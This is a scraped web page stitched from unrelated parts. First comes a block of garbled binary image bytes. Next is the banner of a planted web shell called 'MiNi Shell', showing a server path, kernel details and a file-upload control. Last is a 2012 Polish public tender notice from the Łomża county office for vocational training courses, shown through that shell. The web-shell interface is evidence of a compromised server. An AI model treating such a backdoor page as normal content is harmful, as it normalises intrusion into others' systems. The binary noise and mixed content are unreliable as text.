JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120420/90683-N-2012.html

<p class="kh_header"><b>Łomża: Przeprowadzenie szkoleń zawodowych dla grupy 90 osób pracujących, które  z własnej inicjatywy są zainteresowane nabyciem nowych, uzupełnieniem lub podwyższeniem kwalifikacji i umiejętności poza godzinami pracy- w ramach realizacji projektu pn. Specjalizacja - motorem sukcesu zawodowego o nr WND-POKL.08.01.01.-20-0661</b><br>
<b>Numer ogłoszenia: 90683 - 2012; data zamieszczenia: 20.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe , ul. Szosa Zambrowskiego 1/27, 18-400 Łomża, woj. podlaskie, tel. 086 2156904, faks 086 2156904.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatlomzynski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń zawodowych dla grupy 90 osób pracujących, które  z własnej inicjatywy są zainteresowane nabyciem nowych, uzupełnieniem lub podwyższeniem kwalifikacji i umiejętności poza godzinami pracy- w ramach realizacji projektu pn. Specjalizacja - motorem sukcesu zawodowego o nr WND-POKL.08.01.01.-20-0661.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot  zamówienia został podzielony na 3 części. 
Wykonawca ma prawo złożyć ofertę na jedną lub kilka części. 
W okresie realizacji umowy zamawiający dopuszcza możliwość skierowania uzgodnionej z wykonawcą liczby osób dla poszczególnych części zamówienia. 
Zamawiający przewiduje możliwość zamówień dodatkowych dla wyłonionych w postępowaniu Wykonawców. 
Nie dopuszcza się składania ofert wariantowych. 

CZĘŚĆ PIERWSZA. 
Szkolenie prawo jazdy kat. C C+E oraz szkolenie w ramach kwalifikacji wstępnej przyśpieszonej w zakresie bloku programowego kat. C, C+E, C1, C1 +E - dla 15 osób 
Termin wykonania zamówienia maj-listopad 2012r. 
Uczestnicy mają do wyboru jeden kursów: Prawo jazdy kat.C lub C+E, wraz z przewozem towarów. 
Zakres merytoryczny min.: Przepisy ruchu drogowego, Praktyczna nauka jazdy. Ładowanie i rozładowywanie, mocowanie ładunków. Prowadzenie ciężarówek wożących towary. Prowadzenie wozów transportujących pocztę i towary. Prowadzenie ciężkich pojazdów silnikowych, tj. platformy z przyczepą lub bez. Prowadzenie cysterny czy wywrotki przystosowanej do transportu materiałów i towarów na krótkim lub długim dystansie. Wykonywanie w razie konieczności drobnych napraw pojazdów.
Zakres szczegółowy: przeprowadzenie szkoleń indywidualnych dla pojedynczych osób lub grup dla max. 15 osób - mieszkańców powiatu Łomżynskiego, m. Łomża., cena badań lekarskich, psychologicznych, oraz egzaminu państwowego dla wszystkich kategorii ujęta w koszcie szkolenia. Badania lekarskie i psychologiczne mają rozpocząć się w dniu rozpoczęcia szkolenia, zapewnione przez Wykonawcę dla uczestników szkolenia: badania lekarskie przeprowadzone przez lekarza medycyny pracy. Badania mają na celu stwierdzenie zdolności do odbycia szkolenia oraz podjęcia zatrudnienia zgodnego z kierunkiem odbytego szkolenia, uczestnicy szkolenia muszą być ubezpieczeni od następstw nieszczęśliwych wypadków od dnia rozpoczęcia szkolenia do dnia zakończenia szkolenia (koszt ubezpieczenia musi być ujęty w koszcie szkolenia - w cenie oferty), wykonawca będzie przyjmował pojedyncze osoby w ramach szkoleń indywidualnych lub grupę osób w ramach szkoleń grupowych - skierowane na kurs przez Zamawiającego, zajęcia teoretyczne muszą odbywać się od poniedziałku do niedzieli, w szczególności sobota-niedziela, nie więcej niż 8 godzin zegarowych dziennie w tym 7 godzin zajęć dydaktycznych, zajęcia praktyczne mogą odbywać się od poniedziałku do niedzieli, w szczególności sobota-niedziela, średnio 2 godziny zegarowe dziennie. 
Zajęcia teoretyczne mają odbywać się na terenie miasta Łomża. 
Dowóz na zajęcia praktyczne z jazdy w warunkach specjalnych -tor poślizgowy, podczas których osoba szkolona powinna odbyć minimum 2 godziny jazdy indywidualnej pokrywa wykonawca. Koszt przejazdu z ośrodka szkoleniowego do miejsca przeznaczonego do jazdy w warunkach specjalnych musi zostać ujęty w kalkulacji stanowiącej załącznik nr 5a.

Należy podać jedno miejsce dla każdego rodzaju zajęć: praktycznych z jazdy w warunkach specjalnych, teoretycznych. Pojazdy mechaniczne na których będzie prowadzone szkolenie będą w pełni sprawne technicznie.
W przypadku awarii wskazanego w ofercie pojazdu, Wykonawca na okres naprawy zapewni samochód zastępczy. Po naprawie, kolejne etapy szkolenia prowadzone są na pojeździe wskazanym w ofercie lub innym nie starszym niż auto które podlega naprawie. 
W cenie oferty muszą być ujęte materiały szkoleniowe - jakie przekazane zostaną na własność każdemu uczestnikowi szkolenia.
Materiały szkoleniowe powinny dotyczyć ściśle tematyki szkolenia. Materiały powinny mieć formę co najmniej papierową. W materiałach szkoleniowych przekazywanych uczestnikom szkolenia znajdować się będą aktualne przepisy, w tym wyjaśnienia poszczególnych zagadnień, czy też graficzne rozrysowanie zasad obowiązujących w przepisach prawa. Materiały szkoleniowe i dydaktyczne muszą posiadać odpowiednie logotypy - wytyczne POKL.
Wykonawca zobowiązany jest do wykonania usługi, w miejscu szkolenia określonym w ofercie, zgodnie z ogólnymi przepisami BHP (Dz. U. Nr 169 z 28.08.2003r.) i ppoż.
Wykonawca przed rozpoczęciem szkolenia, w miejscu szkolenia wskazanym w ofercie, zobowiązany jest zapoznać się z informacją o zagrożeniach występujących w miejscu szkolenia. 
Warunki szczegółowe wykonania zamówienia dla poszczególnych zadań: program szkolenia ma zawierać liczbę godzin zajęć teoretycznych i praktycznych dla każdej osoby zgodnie z Ustawą z dnia 6 września 2001 r. o transporcie drogowym (Dz.U. 2001 Nr 125 poz. 1371 z późń. zm.) w związku z Rozporządzeniem Ministra Infrastruktury z dnia 1 kwietnia 2010 r. (Dz.U z 2010 r. Nr 53, poz. 314) w sprawie szkolenia kierowców wykonujących przewóz drogowy. 
Szkolenie w ramach kwalifikacji wstępnej przyśpieszonej w zakresie bloku programowego kat. C, C+E, C1, C1 +E  - Kwalifikacja wstępna przyśpieszona - 140h 
Wykonawca w ramach zajęć powyżej 6 godz. zegarowych (wraz z przewidzianymi przerwami), zobowiązany jest wydać ciepły posiłek uczestnikom kursu - koszt przewidziany w ofercie.
Wykonawca jest zobowiązany dla każdej grupy szkolenia przygotować indywidualny harmonogram szkolenia zarówno części teoretycznej i praktycznej. Harmonogram przed rozpoczęciem szkolenia należy przekazać Zamawiającemu. O każdej zmianie harmonogramu wykonawca jest zobowiązany powiadomić jednostkę zlecającą.

Ukończenie szkolenia zostanie potwierdzone stosownym zaświadczeniem, zgodnie z obowiązującymi w tym zakresie przepisami prawa.
Na każdym szkoleniu ośrodek szkolenia prowadzi dziennik zajęć teoretycznych oraz dla każdej osoby skierowanej, karty zajęć praktycznych zgodnie z programem szkolenia. 
Absolwent kursu powinien ponadto posiadać wiadomości w zakresie bezpiecznego kierowania pojazdem, przepisów dot. czasu pracy kierowców, dokumentów wymaganych w krajowym i międzynarodowym przewozie osób i towarów, planowania trasy przejazdu, czytania map drogowych, jak również warunków bezpieczeństwa związanych z przewozem osób i towarów oraz z załadunkiem i rozładunkiem.

W ramach każdego kursu wykonawca ponosi koszt: koszty wszystkich niezbędnych badań lekarskich i testów psychotechnicznych wymaganych powszechnie obowiązującymi przepisami prawa, jakie musi przejść każda szkolona osoba, koszt kursu teoretycznego dla danej kategorii, koszt kursu praktycznego dla danej kategorii, koszt egzaminu wewnętrznego przeprowadzanego u wykonawcy, koszt pierwszego podejścia absolwenta kursu do egzaminu państwowego, koszt materiałów szkoleniowych dla każdego uczestnika kursu, koszt ubezpieczenia uczestnika szkolenia, koszt wyżywienia uczestnika 
Powyższe koszty powinny być wkalkulowane w cenę oferty.
Wykonawca zobowiązany będzie do bieżącego prowadzenia w trakcie szkolenia listy obecności uczestników oraz przedstawiania kopii tej listy Zamawiającemu w terminie 3 dni od zakończeniu szkolenia.
Wykonawca zobowiązany będzie do prowadzenia dokumentacji przebiegu szkolenia stanowiącej: dziennik zajęć teoretycznych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych, kartę zajęć praktycznych, protokół z egzaminu wewnętrznego, rejestr wydanych zaświadczeń lub innych dokumentów, potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji. 
Na każdym szkoleniu powinna być wydana dla osoby skierowanej karta prowadzonych zajęć praktycznych, zgodnie z programem szkolenia. Po ukończeniu szkolenia, nie później niż w terminie 7 dni kopia, zostanie przekazana zamawiającemu.
Zamawiający zastrzega sobie prawo do przeprowadzania kontroli efektywności i prawidłowości szkolenia zgodnie z obowiązującym w tym zakresie przepisami i na warunkach określonych w umowie. Ponadto Zamawiający zastrzega sobie prawo do kontroli frekwencji uczestników, jak też prawo wglądu do dokumentów, w tym finansowych, związanych z realizacją niniejszej umowy.

Zamawiający nie ponosi kosztów szkolenia osób, które w trakcie szkolenia teoretycznego zostaną skreślone z listy uczestników. Zamawiający ponosi tylko koszty przypisane indywidualnie do osoby- koszt badań, wyżywienia, materiałów szkoleniowych, ubezpieczenia, itp. Płatności dokonywane będą wyłącznie za rzeczywiście przeszkoloną liczbę osób skierowanych na szkolenie, według kosztu za jedną osobę nie wyższego od zawartego w ofercie. Jeśli skierowana osoba odbyła tylko część planowanych zajęć praktycznych na szkoleniu, Zamawiający zwraca koszty szkolenia wg kosztu za jedną godzinę jazdy, skalkulowanego proporcjonalnie do ilości przeprowadzonych działań zgodnie z preliminarzem kosztów stanowiącym załącznik do Specyfikacji.  

Zapłata wynagrodzenia nastąpi przelewem w terminie 30 dni od dnia dostarczenia Zamawiającemu faktury i kalkulacji obejmującej faktycznie poniesione koszty oraz zestawienia wydatków składających się na kwotę rachunku. Wynagrodzenie płatne będzie przelewem na rachunek Wykonawcy.

Jeżeli Wykonawca wykona zamówienie w sposób nienależyty, Zamawiający może potrącić do 20% wartości wynagrodzenia.

Jeżeli Zamawiający stwierdzi rażące naruszenie warunków umowy przez Wykonawcę, wraz z prawem odstąpienia od umowy bez wypowiedzenia, przysługuje mu roszczenie o zapłatę kary umownej w wysokości 20% kwoty oferty.

Jeżeli wysokość szkody poniesionej przez Zamawiającego w wyniku nienależytego wykonania zamówienia przekracza wysokość kar umownych, Zamawiający może dochodzić odszkodowania na zasadach ogólnych.

CZĘŚĆ DRUGA

Szkolenie-Operator koparko-ładowarki dla -15 os. 
Termin realizacji zamówienia lipiec-grudzień 2012r.
Zakres merytoryczny min.:
Sprawne i właściwe działanie urządzeń i zespołów maszyny.   
Urabianie calizny z dostosowanie grubości skrawanej warstwy do rodzaju skały. Przekazanie urobku na środki transportu (składy wagonów, przenośniki taśmowe). Koordynacja i współpraca z obsługą środków transportu odbierających urobek. Dokonywanie zmiany położenia koparki lub zwałowarki w miarę postępu eksploatacja skarpy. Montowanie, demontowanie, przeglądanie, naprawianie i remonty bieżące maszyn. Przepisy bhp i ppoż.,w tym stosowanie odzieży ochronnej i sprzętu ochrony osób oraz zabezpieczenie  przeciwurazowe.

Szkolenie powinno się odbywać tylko na terenie powiatów: Łomża, m. Łomża. 

Kursy winny być zakończone egzaminem państwowym przed komisją powołaną przez Centrum Certyfikacji i Koordynacji Szkolenia Operatorów Maszyn Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie (Podstawa prawna Rozporządzenie Ministra Gospodarki z dnia 20 września 2001 w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz.U. z 2001 r. nr 118, poz.1263).

Wszystkie zajęcia szkoleniowe winne obejmować swą tematyką program szkolenia opracowany przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie w myśl Rozporządzenia Ministra Gospodarki z dnia 20 września 2001 w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych.
Koszt egzaminu państwowego i wydanie dokumentu potwierdzającego uprawnienia (książeczka operatora) powinien być wliczony w cenę szkolenia.
Ponadto wykonawca zapewnia: pokrycie kosztów badań lekarskich, pokrycie kosztów egzaminu przeprowadzonego przez komisję powołaną przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie, wydanie zaświadczeń/certyfikatów potwierdzających pozytywne ukończenie szkolenia przez uczestnika oznaczonych logotypami zgodnymi z wytycznymi EFS, ubezpieczenie NW uczestników projektu na okres trwania szkoleń. 
Ramowy program szkolenia - musi zostać załączony do oferty.

CZĘŚĆ TRZECIA
Dwa szkolenia
Szkolenie 1- Księgowy dla 30 osób 2grupy x 15 os. -150 godz. grupa
Termin realizacji zamówienia IX-XII.2012r. - 1 grupa i styczeń-kwiecień 2013r. - 2 grupa.
Zakres merytoryczny min.:
Prowadzenie obsługi finansowo-księgowej, planowanie budżetu, bieżąca ewidencja i rejestracja operacji gospodarczych, obliczanie i rozliczanie kosztów produkcji, podatki i składki, kontrola dokumentów finansowych, sporządzanie zestawień obrotów i sald syntetycznych, sprawozdań finansowych oraz bilansów zysków i strat. Uzupełnione o zagadnienia związane z obsługa komputerowego programu księgowego.
Szkolenie powinno obejmować: rachunkowość komputerowa, pakiet MS OFFICE, program SYMFONIA.  
Szkolenia w pracowni komputerowej z wykorzystaniem pracy uczestnika przy komputerze min. 75 godz. szkolenia.
Szkolenie zakończone egzaminem wewnętrznym sprawdzającym umiejętności zdobyte przez uczestników .
Ramowy program szkolenia - musi zostać załączony do oferty.

Szkolenie 2- Specjalista do spraw kadr dla 30 osób 2grupy x 15 os. -150 godz./grupa 
Termin realizacji zamówienia XI.2012r. - luty 2013r. - 1 grupa i marzec-czerwiec 2013r. -2 grupa
Zakres merytoryczny min.:
Opracowywanie, weryfikacja i przechowywanie dokumentów związanych ze sprawami pracowników, gromadzenie danych dotyczących pracowników ,opracowywanie i przeglądanie dokumentów kandydatów do pracy np. ocena kwalifikacji i uprawnień kandydatów, sprawdzanie wiarygodności kandydatów, zbieranie danych z potencjalnych źródeł informacji przygotowanie rekomendacji dotyczącej obsadzania stanowisk , raporty na tematy związane z działalności w zakresie zarządzania zasobami ludzkimi, obsługa kadrowego programu komputerowego - pakiet MS OFFICE, System SYMFONIA - kadry i płace, ubezpieczenia i program PŁATNIK
Szkolenia w pracowni komputerowej z wykorzystaniem pracy uczestnika przy komputerze min. 75 godz. szkolenia.
Szkolenie zakończone egzaminem wewnętrznym sprawdzającym umiejętności zdobyte przez uczestników .
Ramowy program szkolenia - musi zostać załączony do oferty.

Cena obu szkoleń powinna obejmować koszta materiałów szkoleniowych, dydaktycznych, pomocniczych, koszty osobowe wykładowców, catering dla uczestników szkoleń i koszty sal wykładowych. 

Zajęcia w obydwu szkoleniach należy zrealizować na terenie miasta Łomży w salach dydaktycznych przystosowanych do prowadzenia zajęć z wykorzystaniem programów komputerowych. Sale wykładowe, warsztatowe, pracownie komputerowe stacjonarne - maksymalnie 1 osoba na stanowisku komputerowym, sprzęt (rzutnik, ekran), materiały szkoleniowe (notatnik, długopis, pendrive), dydaktyczne (zbindowany konspekt szkolenia), catering (kawa, herbata, woda, ciastka) + obiad podczas szkoleń, zaświadczenia o ukończeniu kursu, ubezpieczenie uczestników zapewnia osobiście i na własny koszt wykonawca. 

Co najmniej 1 sala wykładowa w ośrodku szkolenia musi być wyposażony w tablicę multimedialną. Sale komputerowe stacjonarne, w których będą się odbywać szkolenia muszą być wyposażone w klimatyzację. Stanowisko komputerowe - wyposażenie podstawowe: monitor ekranowy, klawiatura, mysz lub trackball, stół, krzesło obrotowe, jednostka centralna oraz wyposażenie dodatkowe Sali szkoleniowej: minimum (1 drukarka, 1 skaner, 1 ksero, 1 projektor multimedialny). Stanowiska komputerowe muszą być zintegrowane i pracować w sieci wewnętrznej połączone z Internetem z możliwością nadzoru prowadzącego zajęcia za pomocą 16-tego komputera. 

W ramach zamówienia wykonawca będzie do sporządzenia konspektów tematycznych dla każdego szkolenia oraz do wydania zaświadczenia dla wszystkich uczestników, którzy ukończyli szkolenie.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Do 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.41.12.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I - Wykonawca wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym czasie, co najmniej dwie usługi/szkolenia oraz przeszkolili łącznie minimum 20 osób w zakresie merytorycznym objętym przedmiotem zamówienia, - potwierdzające posiadanie wiedzy i doświadczenia w zakresie niezbędnym do wykonania zamówienia będącego przedmiotem niniejszego postępowania. 
Część II - Wykonawca wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym czasie, co najmniej dwie  usługi/szkolenia oraz przeszkolili łącznie minimum 20 osób w zakresie merytorycznym objętym przedmiotem zamówienia, - potwierdzające posiadanie wiedzy i doświadczenia w zakresie niezbędnym do wykonania zamówienia będącego przedmiotem niniejszego postępowania. 
Część III - Wykonawca wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym czasie, co najmniej dwie usługi/szkolenia (każde szkolenie trwające min. 80 godz. lekcyjnych.) oraz przeszkolili łącznie minimum 30 osób w zakresie merytorycznym objętym przedmiotem zamówienia, - potwierdzające posiadanie wiedzy i doświadczenia w zakresie niezbędnym do wykonania zamówienia będącego przedmiotem niniejszego postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I - Wykonawca dysponuje potencjałem technicznym niezbędnym do wykonania zamówienia tj. zapewni: pojazdy ciężarowe, autobus do przeprowadzenia szkolenia przez cały okres jego trwania zgodnie z warunkami określonymi w ustawie z dnia 6 września 2001 r. o transporcie drogowym  (Dz. U. 2001 Nr 125 poz. 1371 z późń. zm.) w związku z § 4 Rozporządzenia Ministra Infrastruktury z dnia 1 kwietnia 2010 r. Dz. U z 2010 r. Nr 53, poz. 314 w sprawie szkolenia kierowców wykonujących przewóz drogowy, poprzez wykazanie potencjału technicznego niezbędnego do realizacji poszczególnych zadań zgodnie z oświadczeniem Wykonawcy. wykonawca dysponuje placówkami przeznaczonymi do szkolenia kierowców i spełniającymi warunki określone ustawie z dnia 6 września 2001 r. o transporcie drogowym  (Dz.U. 2001 Nr 125 poz. 1371 z późń. zm.) w związku z § 3 Rozporządzenia Ministra Infrastruktury z dnia 1 kwietnia 2010 r. Dz. U z 2010 r. Nr 53, poz. 314 w sprawie szkolenia kierowców wykonujących przewóz drogowy, poprzez wykazanie wykazu placówek, w których realizowane będą zadania zgodnie z oświadczeniem Wykonawcy. 
Część II i III oświadczenie wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I - Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia oraz posiadającymi kwalifikacje niezbędne do wykonania zamówienia tj.: instruktorami posiadającymi uprawnienia (dokumenty potwierdzające uprawnienia do przeprowadzenia szkolenia) zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym  (Dz. U. 2001 Nr 125 poz. 1371 z późń. zm.) w związku z Rozporządzeniem Ministra Infrastruktury z dnia 1 kwietnia 2010 r. Dz. U z 2010 r. Nr 53, poz. 314 w sprawie szkolenia kierowców wykonujących przewóz drogowy, poprzez wykazanie osób, które będą uczestniczyć w realizacji szkolenia (poszczególnych zadań) zgodnie z oświadczeniem Wykonawcy. 
Część II - Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia oraz posiadającymi kwalifikacje niezbędne do wykonania zamówienia tj.: instruktorami posiadającymi uprawnienia (dokumenty potwierdzające uprawnienia do przeprowadzenia szkolenia) zgodnie z rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych, poprzez wykazanie osób, które będą uczestniczyć w realizacji szkolenia (poszczególnych zadań) zgodnie z oświadczeniem Wykonawcy. 
Część III - wykonawca dysponuje osobami zdolnymi do wykonania zamówienia oraz posiadającymi kwalifikacje niezbędne do wykonania zamówienia tj.:  osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadają uprawnienia: wykształcenie wyższe kierunkowe odpowiadające prowadzonemu przedmiotowi lub udokumentowane uczestnictwo w kursie/szkoleniu odpowiadające prowadzonemu przedmiotowi lub posiadają 5 letni staż pracy na stanowisku odpowiadającym zakresowi tematycznemu prowadzonego przedmiotu, które będą uczestniczyć w realizacji szkolenia (poszczególnych zadań) zgodnie z oświadczeniem Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 200.000 złotych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
